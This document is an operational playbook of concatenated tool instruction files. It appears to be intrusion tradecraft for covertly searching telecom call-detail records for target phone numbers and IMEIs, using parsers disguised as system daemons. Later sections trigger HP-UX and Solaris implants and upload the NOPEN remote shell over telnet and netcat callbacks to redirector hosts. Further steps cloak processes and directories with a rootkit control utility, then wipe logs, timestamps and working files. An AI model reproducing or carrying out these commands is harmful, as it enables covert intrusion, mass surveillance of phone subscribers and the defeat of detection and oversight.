ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc | head -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc | tail -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_khi01 | head -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_khi01 | tail -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_isb01 | head -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_isb01 | tail -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_lhr01 | head -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_lhr01 | tail -
10
-lt /u03/archive/collect
# newer stuff
ls -latr /u03/archive/collect/siemens_msc_isb01 | head -10
ls -latr /u03/archive/collect/siemens_msc_isb01 | tail -10
ls -latr /u03/archive/collect/siemens_msc_isb01 | wc -l
# old stuff:
ls -latr /u03/archive/collect/siemens_msc_khi01 | head -10
ls -latr /u03/archive/collect/siemens_msc_khi01 | tail -10
########################## editionhaze:
ls -latr /u06/saba/CDR/out/MS* | head -10
ls -latr /u06/saba/CDR/out/MS* | tail -10
ls -latr /u06/saba/CDR/out/MS* | wc -l
########################## liquidsteel:
########################## sicklestar:
### magnum: CURSEHAPPY not working on all SS .usd files :-(
### Try these first, should be all of them in one spot
ls -latr /usd_archive/mc_storage/*usd | head -10
ls -latr /usd_archive/mc_storage/*usd | tail -10
### If none in previous ones...
ls -latr /sys1/var/billing/out_coll/*usd | head -10
ls -latr /sys1/var/billing/out_coll/*usd | tail -10
ls -latr /sys1/var/alcatel/out_coll/*usd | head -10
ls -latr /sys1/var/alcatel/out_coll/*usd | tail -10
ls -latr /sys1/var/billing/msc_is2 | tail -20
########################## CURSEHAPPY #########################################
###############
################################################################################
###############
### Now, encrypt the ascii list...first make sure you have the encryption tool:
which cryptTool.v1.0.Linux2.4.18-14.targetdl
### If cryptTool not in PATH, change your PATH or insert full path in command
### to encrypt one at a time...skip to next comment to encrypt all at once:
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile1.txt -o argfile1.enc -k CRYPTK
EY -b
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile2.txt -o argfile2.enc -k CRYPTK
EY -b
file argfile*.enc
### to encrypt all at the same time:
for i in argfile* ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `basename
$i .txt`.enc -k CRYPTKEY -b ; done
ls -l
file argfile*.enc
### encrypt the def files
for i in /current/up/cursedefs/*.def ; do cryptTool.v1.0.Linux2.4.18-14.targetdl
-i $i -o /current/up/cursedefs/`basename $i .def`.enc -k CRYPTKEY -b ; done
ls -l
file /current/up/cursedefs/*.enc
### encrypt the def files
############ argfile 2
-put /current/up/cursedefs/PROJECTNAME.enc adm~
-put /current/down/argfiles/argfile2.enc adm
KEY=CRYPTKEY; export KEY; ./crond -def ./adm~ -n ./adm -d /CHANGEME/CDRFILES.200
6071[3456]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.enc2
-beep 15
############ argfile 3
-put /current/up/cursedefs/PROJECTNAME.enc adm~
-put /current/down/argfiles/argfile3.enc adm
KEY=CRYPTKEY; export KEY; ./crond -def ./adm~ -n ./adm -d /CHANGEME/CDRFILES.200
6071[3456]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.enc3
-beep 15
#############
############# for loglevel testing (local file should be ascii?)
#############
-put /current/up/cursedefs/PROJECTNAME.enc adm~
-put /current/down/argfiles/argfile1.enc adm
KEY=CRYPTKEY; export KEY; ./crond -def ./adm~ -n ./adm -w e -loglevel 2 -d /CHAN
GEME/CDRFILES.2006071[0-2]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.tes
t
-beep 15
######
##### when it's done running, decrypt the file (-d -c options)
######
cd /current/down
ls -latr cdr*enc*
# to decrypt individually:
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.cursehappy.HOST.DDMonYY.enc1 -
o cdrhits.cursehappy.HOST.DDMonYY.txt1 -k CRYPTKEY -d -c
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.cursehappy.HOST.DDMonYY.enc2 -
o cdrhits.cursehappy.HOST.DDMonYY.txt2 -k CRYPTKEY -d -c
######
###### copy DECRYPTED data to media
######
ls -l cdr*txt*
mz
cp cdr*txt* /mnt/zip*/PROJECTNAME
ls -l /mnt/zip*/PROJECTNAME
uz
#####
##### clean up
#####
-rm crond adm adm~
-lt
-cd /tmp
-rm .scsi
-lt
w
ps -ef | sort
-lt /
-burnBURN
###
### END File user.tool.cursehappy.COMMON
### (see also ../etc/user.tool.cursehappy.COMMON)
###
### BEGIN File user.tool.orleansstride.COMMON (see also ../etc/user.tool.orlea
nsstride.COMMON)
###
################ ORLEANSSTRIDE #########################
############### PARSING #######################################################
############
### vi Search/Replace commands ###
### ProjectName - self explanatory
### Date field - today's date, used for output files
### Host - hostname of the box (not IP address)
### Cryptkey - encryption key (use output from below md5sum command)
md5sum /current/down/tcpdump.raw
mx
:%s/PROJECTNAME/PROJECTNAME/g
:%s/DDMonYY/DDMonYY/g
:%s/HOST/HOST/g
:%s/CRYPTKEY/CRYPTKEY/g
'x
### Save the encryption key locally:
echo CRYPTKEY > /current/down/cryptkey.orleansstride.DDMonYY
####### Prepare files containing numbers to search for:
# if files containing the numbers to search available:
mkdir /current/down/argfiles
cd /current/down/argfiles
mz
cp /mnt/zip*/arg* /current/down/argfiles
#or
cp /mnt/zip*/PROJECTNAME/arg* /current/down/argfiles
ls -altr
### For ORLEANSSTRIDE, the numbers must be in sorted order...the following loop
### will put all of the files in sorted order
cd /current/down/argfiles
for i in argfile*.txt; do sort -u -o `basename $i .txt`.sorted; done
##### Upload the encrypted phone list as awk, modify each parser command to hav
e the
##### correct directory and date range of files to parse, then run the parser:
##### NOTE: MUST CORRELATE NUMBERS IN ENCRYPTED TASKING FILENAMES (i.e. argfile1
.enc)
##### TO OUTPUT FILENAMES (cdrhits*.enc1, cdrhits*.enc1.more, cdrhits*.enc1.more
2, etc.)
##### NOTE2: GO FROM MOST RECENT TIME TO (PROBABLY CURRENT DATE) AS FAR BACK AS
TIME ALLOWS
############ argfile 1
-put /current/down/argfiles/argfile1.enc awk
-setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[789]*.mob' -print"
-P ./awk
./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc1
-beep 15
### Run again if needed for same tasking
-put /current/down/argfiles/argfile1.enc awk
-setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[56]*.mob' -print" -
P ./awk
./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc1.more
-beep 15
############ argfile 2
-put /current/down/argfiles/argfile2.enc awk
-setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[789]*.mob' -print"
-P ./awk
./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc2
-beep 15
### Run again if needed for same tasking
-put /current/down/argfiles/argfile2.enc awk
-setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[56]*.mob' -print" -
P ./awk
./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc2.more
-beep 15
############ argfile 3
-put /current/down/argfiles/argfile3.enc awk
-setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[789]*.mob' -print"
-P ./awk
./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc3
-beep 15
### Run again if needed for same tasking
-put /current/down/argfiles/argfile3.enc awk
-setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[56]*.mob' -print" -
P ./awk
./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc3.more
-beep 15
######
###### survey mode:
######
### checks for IMEIs that have more than one IMSI associated with it:
### to limit amount of memory used, replace "-x" with "-X numberBytes"
-setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[56]*.mob' -print" -
x
./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc.surveyIMEI
### generates a list of Cell IDs associated with each MSC address:
### to limit amount of memory used, replace "-y" with "-Y numberBytes"
-setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[56]*.mob' -print" -
y
./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc.surveyMSC
######
##### when it's done running, decrypt the file (-d -c options)
######
cd /current/down
ls -latr cdr*enc*
# to decrypt individually:
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.orleansstride.HOST.DDMonYY.enc
1 -o cdrhits.orleansstride.HOST.DDMonYY.txt1 -k CRYPTKEY -d -c
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.orleansstride.HOST.DDMonYY.enc
2 -o cdrhits.orleansstride.HOST.DDMonYY.txt2 -k CRYPTKEY -d -c
#####
##### clean up
#####
-rm nscd awk
-lt
-cd /tmp
-rm .scsi
-lt
w
ps -ef | sort
-lt /
-burnBURN
###
### END File user.tool.orleansstride.COMMON
### (see also ../etc/user.tool.orleansstride.COMMON)
###
### BEGIN File user.tool.skimcountry.COMMON (see also ../etc/user.tool.skimcou
ntry.COMMON)
###
################ SKIMCOUNTRY #########################
############### PARSING #######################################################
############
### Now, encrypt the ascii list locally... first make sure you have the encrypti
on tool:
cd /current/down/argfiles
which cryptTool.v1.0.Linux2.4.18-14.targetdl
### If cryptTool not in PATH, change your PATH or insert full path in command
### to encrypt one at a time...skip to next comment to encrypt all at once:
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile1.txt -o argfile1.enc -k CRYPTK
EY -b
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile2.txt -o argfile2.enc -k CRYPTK
EY -b
file argfile*.enc
### to encrypt all at the same time:
for i in argfile* ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `basename
$i .txt`.enc -k CRYPTKEY -b ; done
ls -l
file argfile*.enc
##### NOTE: MUST CORRELATE NUMBERS IN ENCRYPTED TASKING FILENAMES (i.e. argfile1
.enc)
##### TO OUTPUT FILENAMES (cdrhits*.enc1, cdrhits*.enc1.more, cdrhits*.enc1.more
2, etc.)
##### NOTE2: GO FROM MOST RECENT TIME TO (PROBABLY CURRENT DATE) AS FAR BACK AS
TIME ALLOWS
### benchmarking:
# phonelist had 44 numbers
# 3 day pull took 38 minutes over ALL directories
# 1 day average pull took 10-13 minutes
### file name extensions:
# GCDR = Nor
# usd = Sie
######## Upload the parser (SKIMCOUNTRY) and called it crond
# put up the parser tool
mkdir /tmp/.scsi
-cd /tmp/.scsi
-put /current/up/skimcountry.v1.2.SunOS5.9.targetdl crond
# or
-put /mnt/zip*/skimcountry.v1.2.SunOS5.9.targetdl crond
##### Upload the encrypted phone list as adm, then run the parser:
############ argfile 1
-put /current/down/argfiles/argfile1.enc adm
./crond -k CRYPTKEY -P adm -z "find /var/archive/output_billing -name 'MSC*06082
[2-4]*ama' -print" >T:/current/down/cdrhits.skimcountry.HOST.DDMonYY.enc1
-beep 15
### Run again if needed for same tasking
-put /current/down/argfiles/argfile1.enc adm
./crond -k CRYPTKEY -P adm -z "find /var/archive/output_billing -name 'MSC*06082
[0-1]*ama' -print" >T:/current/down/cdrhits.skimcountry.HOST.DDMonYY.enc1.more
-beep 15
############ argfile 2
-put /current/down/argfiles/argfile2.enc adm
./crond -k CRYPTKEY -P adm -z "find /var/archive/output_billing -name 'MSC*06082
[2-4]*ama' -print" >T:/current/down/cdrhits.skimcountry.HOST.DDMonYY.enc2
-beep 15
-put /current/down/argfiles/argfile2.enc adm
./crond -k CRYPTKEY -P adm -z "find /var/archive/output_billing -name 'MSC*06082
[0-1]*ama' -print" >T:/current/down/cdrhits.skimcountry.HOST.DDMonYY.enc2.more
-beep 15
######
###### to parse other vendor files:
######
#./crond -k CRYPTKEY -P adm -z "ls -1rt /var/archive/output_billing/*/MSC*200606
29*usd*ama" > .mcftpl38755
######
##### when it's done running, decrypt the file (-d -c options)
######
cd /current/down
ls -latr cdr*enc*
# to decrypt individually:
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.skimcountry.HOST.DDMonYY.enc1
-o cdrhits.skimcountry.HOST.DDMonYY.txt1 -k CRYPTKEY -d -c
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.skimcountry.HOST.DDMonYY.enc2
-o cdrhits.skimcountry.HOST.DDMonYY.txt2 -k CRYPTKEY -d -c
######
DAIRYFARM procedures:
mx
:%s/TARGET_IP/TARGET_IP/g
:%s/WINDOWS_REDIR_IP/WINDOWS_REDIR_IP/g
:%s/LINUX_OP_BOX_IP/192.168.254.71/g
:%s/WINDOWS_OP_BOX_IP/192.168.254.72/g
:%s/CONTROL_PORT/CONTROL_PORT/g
:%s/XSERVER_PORT/XSERVER_PORT/g
:%s/NETCAT_PORT/NETCAT_PORT/g
:%s/NOPEN_PORT/NOPEN_PORT/g
:%s/RAT_NAME/sendmail/g
:%s,TMP_DIR,/tmp/.scsi,g
`x
### Follow steps in this order:
###
### END File user.tool.dairyfarm.COMMON
### (see also ../etc/user.tool.dairyfarm.COMMON)
###
### BEGIN File user.tool.trigger_hpux_jl_in.COMMON (see also ../etc/user.tool.
trigger_hpux_jl_in.COMMON)
###
###############################################################
# TRIGGERING HPUX INCISION via JACKLADDER and JACKLADDERHELPER
###############################################################
### BACKGROUND:
### HP-INCISION provides process and file hiding. It does NOT provide
### connection hiding nor does it have a triggering capability in this
### version (1.1.2.1 for HPUX11.00)
### HP-JACKLADDER differs from other JACKLADDERs because it requires the use
### of special source ports for triggering. The purpose of the special source
### ports is two-fold: it plays a part in the authentication process for the
### trigger, and it causes the 'accept' call to wait an extra 5 seconds for
### input, thus allowing it to work via most redirection (as long as the
### roundtrip time between the redirector and the target is less than 5
### seconds.)
### JACKLADDERHELPER is an "instant-grat" version listening on an extra port.
### It only listens until the target reboots.
### On HPUX, it is typically installed on port 7162 running as 'memlogd'.
### JACKLADDER will take over once the target reboots. Depending on how it
### was installed, it will listen on ports started by inetd (check
### /etc/inetd.conf) or on the sendmail port.
### The HP-JACKLADDER and HP-JACKLADDERHELPER special source ports are:
### 3, 51, 8213, 12634, 16798, 23247
HP-TARGET-IP self-explanatory
HP-JL-SOURCE-PORT 3, 51, 8213, 12634, 16798, or 23247
JL-LISTEN-PORT before target reboots - double-check but probably 7162;
after target reboots - double-check, but probab
ly try (13,
21, 23, 37, 113)
NETCAT-PORT random for uploading nopen
LINUX-OP-BOX local Linux machine (probably 192.168.254.71)
WIN-OP-BOX local Windows machine (probably 192.168.254.72)
UNIX-REDIR-IP IP that target will call back to
WIN-REDIR-IP IP that target will call back to
NOPEN_DIR directory to upload nopen to (/tmp/.scsi usually)
(WILL NEED TO ESCAPE SLASHES)
NOPEN_NAME name of nopen on target
NOPEN_PORT port to run nopen on
mx
:%s/HP_TARGET_IP/HP_TARGET_IP/g
:%s/HP_JL_SOURCE_PORT/HP_JL_SOURCE_PORT/g
:%s/JL_LISTEN_PORT/JL_LISTEN_PORT/g
:%s/NETCAT_PORT/NETCAT_PORT/g
:%s/LINUX_OP_BOX/LINUX_OP_BOX/g
:%s/WIN_OP_BOX/WIN_OP_BOX/g
:%s/UNIX_REDIR_IP/UNIX_REDIR_IP/g
:%s/WIN_REDIR_IP/WIN_REDIR_IP/g
:%s/NOPEN_DIR/NOPEN_DIR/g
:%s/NOPEN_NAME/NOPEN_NAME/g
:%s/NOPEN_PORT/NOPEN_PORT/g
'x
#########################################################
### TO CONNECT TO JACKLADDER* thru solaris box:
#########################################################
### Verify the JACKLADDERHELPER port is still listening
### If the port doesn't respond, the target may have rebooted or JACKLADDER_HELP
ER died
### "Connection refused" means that the port isn't listening
### Otherwise scan for ports that should be started by inetd
### jackladderhelper port is probably 7162
-scan JL_LISTEN_PORT TARGET_IP
### On Solaris redirector:
-jackpop HP_TARGET_IP JL_LISTEN_PORT UNIX_REDIR_IP HP_JL_SOURCE_PORT
Your Choice[1] 1
UTC offset? [0]
Which port will we be uploading nopen on? [44841] NETCAT_PORT
Which port would you like nopen to listen on? [48970] NOPEN_PORT
Nopen to upload[] CORRECT_NOSERVER_FROM_MORERATS
Which directory would you like to create[/tmp/.dskman] NOPEN_DIR
What would you like nopen called on target [podd] NOPEN_NAME
Do you want incision to bless the nopen server? [Yn] Y
Continue? [Yn] Y
### after the upload completes:
### close both jackpop windows,
### type DONE in -jackpop window
### connect using the -nstun command given by the -jackpop window
############ GO TO WEARCUP SECTION NOW IF SUCCESSFUL #########
######## TROUBLESHOOTING ONLY - avoid syntax errors with commands being executed
on target!:
### Test JL from redirector:
### special source ports: 3, 51, 8213, 12634, 16798, 23247
### Probably need to redirect output (2>&0 1>&0 as below) for every
### command run
-jackpop HP_TARGET_IP JL_LISTEN_PORT UNIX_REDIR_IP HP_JL_SOURCE_PORT
3
0
Y
date 2>&0 1>&0
DONE
##############################################################
### TO CONNECT TO HP-UX JACKLADDER* thru non-Solaris Unix box:
##############################################################
### Window 1 on Unix redirector:
-tunnel
l JL_LISTEN_PORT HP_TARGET_IP JL_LISTEN_PORT HP_JL_SOURCE_PORT
r NETCAT_PORT
### Window 2 on Unix redirector:
# If nopen calling back:
-nrtun NOPEN_PORT
# If calling into nopen, don't run this until you run window 4 cmd
# and nopen appears to be successfully uploaded
-nstun HP_TARGET_IP:NOPEN_PORT
### Window 3 local
packrat NOPEN_NAME CORRECT_NOSERVER_IN_MORERATS NETCAT_PORT
### Window 4 local and scripted
# If calling forward into nopen:
LD_PRELOAD=/current/bin/connect.so CMD="mkdir NOPEN_DIR; cd NOPEN_DIR; telnet UN
IX_REDIR_IP NETCAT_PORT </dev/console >NOPEN_NAME.uu; uudecode NOPEN_NAME.uu ; u
ncompress -f NOPEN_NAME.Z; chmod 700 NOPEN_NAME; export PATH=.; export D=-lNOPEN
_PORT; NOPEN_NAME" RA=UNIX_REDIR_IP RP=HP_JL_SOURCE_PORT HIDEME= nc 127.0.0.1 JL
_LISTEN_PORT
# If nopen is calling back:
LD_PRELOAD=/current/bin/connect.so CMD="mkdir NOPEN_DIR; cd NOPEN_DIR; telnet UN
IX_REDIR_IP NETCAT_PORT </dev/console >NOPEN_NAME.uu; uudecode NOPEN_NAME.uu ; u
ncompress -f NOPEN_NAME.Z; chmod 700 NOPEN_NAME; export PATH=.; export D=-cUNIX_
REDIR_IP:NOPEN_PORT; export S=30; NOPEN_NAME" RA=UNIX_REDIR_IP RP=HP_JL_SOURCE_P
ORT HIDEME= nc 127.0.0.1 JL_LISTEN_PORT
### TROUBLESHOOTING: CMD can be changed to be any string of shell commands.
### If output from any command in the string desired, you may have to append
### the string "2>&0 1>&0" to each command
### i.e. "ls -la /tmp 2>&0 1>&0; uname -a 2>&0 1>&0"
###
### NOTE: you cannot remove or overwrite a running binary on HP-UX, so if
### you are trying to overwrite something during troubleshooting, this may
### be why
#########################################################
### TO CONNECT TO JACKLADDER* thru windows box:
#########################################################
### from windows target, scan JACKLADDERHELPER to see if it's still listening:
banner -ip HP_TARGET_IP -port JL_LISTEN_PORT
### windows tunnels:
### ----------------
# Examples to connect, connect back to packrat window to upload nopen, and -nstu
n to target:
### connect to JACKLADDER*
### background redirect -tcp -lplisten JL-LISTEN-PORT -target HP-TARGET-IP JL-LI
STEN-PORT HP-JL-SOURCE-PORT -bind WIN-OP-BOX
### background redirect -tcp -lplisten 7162 -target 10.27.50.41 7162 12634 -bind
192.168.254.72
background redirect -tcp -lplisten JL_LISTEN_PORT -target HP_TARGET_IP JL_LISTEN
_PORT HP_JL_SOURCE_PORT -bind WIN_OP_BOX
#########################################################
# Running WEARCUP and NOT using -burn
#########################################################
### Once connected, you will be in your temporary directory and will need
### to clean it up. However, HPUX systems will not allow you to delete an
### executable if it's running, nor the directory it's running in. To
### circumvent this, use 'cup' (CleanUp)
-lt
-rm nscd.uu
-gs wearcup -h
# change the options for what you want to call cup and how long you want cup
# to sleep before it kills nopen and cleans your working directory,
# then run it
-gs wearcup -r snmpd -w 4h
# when it is time to end the op, kill the "sleep" pid to start immediate cleanup
# to extend the op, kill the pid of the script (now called snmpd) then kill the
sleep
# DO NOT -burnBURN !!!!!!
# use -exit for your windows!!!!!
#########################################################
### HP-INCISION technique checks
#########################################################
############################################################################
##### INSTALLATION #####
############################################################################
## First, make sure no other implants are installed, i.e. the family
# If Solaris
-strings /platform
###################################################
### Trigger Dewdrop and verify SS is working ######
###################################################
### Below are commands to trigger DD without upload/execute, there
### will be no Nopen session, will have a prompt in the "ish" shell
### Possibility exists will have to play with options to ourtn/-irtun
### to trigger on certain ports, etc.
### Try THIS first (if redirecting from Nopen)
-irtun TARGET_IP CALLBACK_PORT -Y5
### or (if going direct)
ourtn -Y5 -p CALLBACK_PORT TARGET_IP
### for Dewdrop-3.X
tipoff-3.X --trigger-address TARGET_IP --target-address TARGET_IP --target-proto
col <tcp/udp> --target-port TARGET_PORT --callback-address CALLBACK_IP --callbac
k-port CALLBACK_PORT --start-ish
### look for output from "pwd" run after target calls back, the resulting
### directory is the SS hidden directory
## In Dewdrop window get the pid of DD connection to ish shell
echo $$
## set DD PID in the rest of the script
mx
:%s/DEWDROP_PID/DEWDROP_PID/g
`x
## In un-elevated Nopen window, verify Dewdrop connection and processes are cloa
ked
ps -ef | grep DEWDROP_PID
netstat -an | grep CALLBACK_PORT
## the hidden directory will be somewhere on the root filesystem,
## you can now do a directory listing of the hidden directory's parent
## in the un-elevated Nopen window to determine that it is indeed hidden
## (i.e. do "-ls /var/tmp" if hidden dir is "/var/tmp/.0123456789abcdef")
##
## REMINDER: DO NOT EXPLICITLY NAME HIDDEN FILES/DIRS FROM AN UNPRIVILEGED
## WINDOW (see top of script for more detailed explanation)
-ls /var/tmp
-ls /lib
-ls /dev
-ls /etc
-ls /
## Report any cloaking failures via notes or "-problem"
#######################################################################
##### IF NO PROBLEMS ENCOUNTERED, INSTALLATION COMPLETE #####
#######################################################################
#######################################################################
##### Ctrl Usage and Troubleshooting Instructions #####
#######################################################################
### Should have at least two Nopen windows: one to become privileged,
### other to stay unprivileged, for comparing outputs of commands
## get the PID of the Nopen window that will become privileged
-pid
## set Nopen PID in the rest of the script
mx
:%s/PRIVILEGED_NOPEN_PID/PRIVILEGED_NOPEN_PID/g
`x
########################################################
## Ctrl Usage Options:
# -C [pid | /file/path] Cloak the given process or file path
# -c [pid | /file/path] Uncloak the given process or file path
# -d Display default cloaked directory
# -E pid Enable the given process's ability to see otherwise
# cloaked processes and files.
# -e pid Disable the given process's ability to see
# otherwise cloaked processes and files.
# -F pid Enable the given process's ability to see otherwise
# cloaked files ONLY.
# -f pid Disable the given process's ability to see
# otherwise cloaked files ONLY.
# -P pid Enable the given process's ability to see otherwise cloaked
# processes ONLY.
# -p pid Disable the given process's ability to see otherwise cloaked
# processes ONLY.
# -K pid Designate a process as to be killed upon shutdown
# -k pid Designate a process as to NOT be killed upon shutdown
# -r /bin/sh Execute the given program as the root user
# -T signal Send the specified signal to all killable cloaked processes.
# -U Invoke a full uninstall (self destruct)
# -u Invoke a partial uninstall (unpatch and unload)
# -s path Set the times associated with a given file path
# -g path Get the times associated with a given file path
########################################################
## upload SS Control Utility using nopen
-put /current/up/Ctrl c
## or ftshell
~~p /current/up/Ctrl c
### If Nopen already a privileged process (i.e. started by a child of DD,
### etc.), do not need to set SEED variable to use Ctrl, otherwise SEED
### must be set
## SEED calculation algorithm. WARNING do this off target!!!
seedcalc TARGET_HOSTNAME
## if you don't have 'seedcalc'
echo -n TARGET_HOSTNAME | rev | tr -d '\n' | md5sum | cut -f1 -d' '
## if you don't have 'rev'
echo -n TARGET_HOSTNAME | sed '/\n/!G;s/\(.\)\(.*\n\)/&\2\1/;//D;s/.//' |
tr -d '\n' | md5sum | cut -f1 -d' '
## set value of SEED in the rest of the script
mx
:%s/CALCULATED_SEED/CALCULATED_SEED/g
`x
## REMINDER: DO NOT USE THIS OUTPUT EXPLICITLY IN AN UNPRIVILEGED PROCESS WHEN
## ACCESSING FILESYSTEM, SEE WARNING AT THE TOP OF THE SCRIPT
## WARNING: WHEN CLOAKING PROCESSES, MUST MAKE SURE THAT NO CLOAKED PROCESS IS
## IS THE PARENT OF AN UNCLOAKED PROCESS. IF NECESSARY TO HAVE A
## PROCESS UNCLOAKED, MUST UNCLOAK PARENTS ALL THE WAY TO INIT (i.e. if
## need an uncloaked Nopen, Nopen listener must be uncloaked as well)
## Use Ctrl to determine the name of the Cloaked directory
SEED=CALCULATED_SEED PATH=. c -d
## Use Ctrl to enable Nopen to see cloaked processes, connections and files.
SEED=CALCULATED_SEED PATH=. c -E PRIVILEGED_NOPEN_PID
## Use Ctrl to cloak the Nopen process, connections.
SEED=CALCULATED_SEED PATH=. c -C PRIVILEGED_NOPEN_PID
## Optional - Designate Nopen to NOT be killed should the implant be
## shutdown (self-destruct). You won't get any notification that this happened.
SEED=CALCULATED_SEED PATH=. c -k PRIVILEGED_NOPEN_PID
## Or, can do the above three actions in one command line
SEED=CALCULATED_SEED PATH=. c -C PRIVILEGED_NOPEN_PID -E PRIVILEGED_NOPEN_PID -k
PRIVILEGED_NOPEN_PID
## can replace PRIVILEGED_NOPEN_PID with the PID of any process you'd like to hi
de
## Find your nopen connections -- consider narrowing the search as you probably
also
## already know your connection ip and port
netstat -an | grep REDIRECTOR_IP
## set Nopen Port in the rest of the script
mx
:%s/NOPEN_PORT/NOPEN_PORT/g
`x
## Find nopen using the privileged process. Verifies you can find Nopen in
## ps and netstat listings when privileged
ps -ef | grep PRIVILEGED_NOPEN_PID
netstat -an |grep NOPEN_PORT
## in an unprivileged window, these should unsuccessful if Nopen was cloaked
## in an earlier Ctrl command
ps -ef | grep PRIVILEGED_NOPEN_PID
netstat -an | grep NOPEN_PORT
## You should now be able to see the cloaked directory
## The cloaked directory MAY be in one of the following. Refer to what
## the `pwd` from Dewdrop returned
-lt /var/tmp
-lt /lib
-lt /dev
-lt /etc
-lt /
### APPENDIX
## DATE Errors
##
## 1 LOADER_ERROR_UNKNOWN
## The requested action failed for an unknown reason.
## 2 LOADER_ERROR_MEMORY
## There was a problem allocating memory.
## 3 LOADER_ERROR_READ_FILE
## There was a problem reading file data.
## 4 LOADER_ERROR_EXTRACT_PAYLOAD
## Could not extract payload data.
## 5 LOADER_ERROR_INVALID_PAYLOAD
## Payload data is invalid.
## 6 LOADER_ERROR_MERGE_ARCHIVE
## Could not merge old archive with new during an upgrade.
## 7 LOADER_ERROR_GENERATE_PAYLOAD
## Could not generate new payload data during an upgrade.
## 8 LOADER_ERROR_BUFFER_TOO_SMALL
## The given buffer is too small to hold the requested data.
## 9 LOADER_ERROR_LIST_BUFFER_TOO_SMALL
## The given array is too small to hold all the requested data elements.
## 10 LOADER_ERROR_SYSINFO
## Could not determine the host system information.
## 11 LOADER_ERROR_ENUMERATE_PLATFORM_TAGS
## Could not enumerate platform types.
## 12 LOADER_ERROR_ENUMERATE_OBJECTS
## Could not enumerate objects associated with a tag.
## 13 LOADER_ERROR_READ_OBJECT
## Could not read object data or meta-data.
## 14 LOADER_ERROR_WRITE_OBJECT
## Could not write object data or meta-data.
## 15 LOADER_ERROR_LOAD_USER_MODULE_OBJECT
## Could not load a user module data object.
## 16 LOADER_ERROR_EXECUTE_OBJECT
## Could not execute an executable data object.
## 17 LOADER_ERROR_KERNEL_SHUTDOWN
## Could not unload existing kernel modules.
## 18 LOADER_ERROR_KERNEL_PLATFORM
## Payload does not contain any kernel modules for this platform.
## 19 LOADER_ERROR_KERNEL_INJECT
## Could not inject modules into the running kernel.
## 20 LOADER_ERROR_KERNEL_INVOKE
## Could not invoke a required kernel service.
## 21 LOADER_ERROR_PERSIST_ENABLE
## Could not enable persistence.
## 22 LOADER_ERROR_PERSIST_READ
## Could not read persistant executable.
## 23 LOADER_ERROR_HOSTID
## Hostid of system did not match the one stored in the archive.
## 24 LOADER_ERROR_EXECL
## Error calling execl(3) when invoking the 64-bit version of the Loader.
## 25 LOADER_ERROR_FORK
## Error calling fork(2) when invoking the 64-bit version of the Loader.
## 26 LOADER_ERROR_WAITPID
## Error calling waitpid(2) when invoking the 64-bit version of the Loader.
## 27 LOADER_ERROR_SIGACTION
## Error calling sigaction(2) when setting the Loader process signal handle
rs.
## 28 LOADER_ERROR_SIGADDSET
## Error calling sigaddset(2) when setting the Loader process signal handle
rs.
################################################################################
###
###
### END File user.tool.stoicsurgeon.COMMON
### (see also ../etc/user.tool.stoicsurgeon.COMMON)
###
### BEGIN File user.tool.dittlelight_hidelite.COMMON (see also ../etc/user.too
l.dittlelight_hidelite.COMMON)
###
############################################################
# DITTLELIGHT (HIDELIGHT)
############################################################
### To run the unix oracle db scripts, you must do them outside of an INCISION p
rocess
### therefore, you can use DITTLELIGHT (HIDELITE) to unhide your nopen window
### You must run HIDELIGHT on a process with a parent PID of "1" so
### do a callback to your redirector and run hidelite on the callback window
### Hidelite
### Create a callback window
# On redirector:
-nrtun NOPEN_PORT
# On target:
-call REDIR_IP NOPEN_PORT
### upload the correct version of hidelite for sparc or linux in a temp director
y:
mkdir /tmp/.scsi
-cd /tmp/.scsi
-put /current/bin/hidelite.sparc crond
# or
-put /current/bin/hidelite.linux crond
### If you were running oracle commands, you can now clean them up:
### Cleanup the logs created from the oracle scripts:
### ex:
# -ls -t /opt/mnt/oracle/product/9.2.0/rdbms/audit
# -rm <NEW_FILES>
# -touch /opt/mnt/oracle/product/9.2.0/rdbms/audit/ora_1473.aud /opt/mnt/oracle/
product/9.2.0/rdbms/audit
### Remove your working directory and -burn nopen when done with op
-cd /tmp
-rm .scsi
-lt /tmp
-burnBURN
###
### END File user.tool.dittlelight_hidelite.COMMON
